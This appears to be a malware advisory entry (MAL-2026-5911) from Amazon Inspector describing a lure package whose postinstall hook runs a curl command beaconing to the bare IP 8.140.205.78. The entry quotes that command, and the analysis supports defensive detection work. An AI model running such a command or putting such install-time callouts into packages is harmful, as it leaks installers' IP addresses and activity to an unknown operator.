MAL-2026-5911

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e6999f05f6036baf4f6d45de0c55c6dd63452dc59ab6ebcbad0ffebf93e60584) package.json declares a postinstall lifecycle hook that runs `curl -s http://8.140.205.78 -o /dev/null` on every install. The package's only functional code is a trivial `hello()` helper in index.js that returns the string 'hello', which is inconsistent with the declared purpose of 'Common utility helpers for frontend projects'. The lifecycle network call has no relation to any advertised functionality and serves only to disclose the installer's public IP address and install timing to the operator of the bare IP 8.140.205.78. This is a classic install-counter / victim-discovery beacon pattern: a throwaway lure package whose real purpose is the install-time callout. Plain HTTP to a bare IP (no TLS, no domain, no documented purpose) is inconsistent with any legitimate telemetry shape.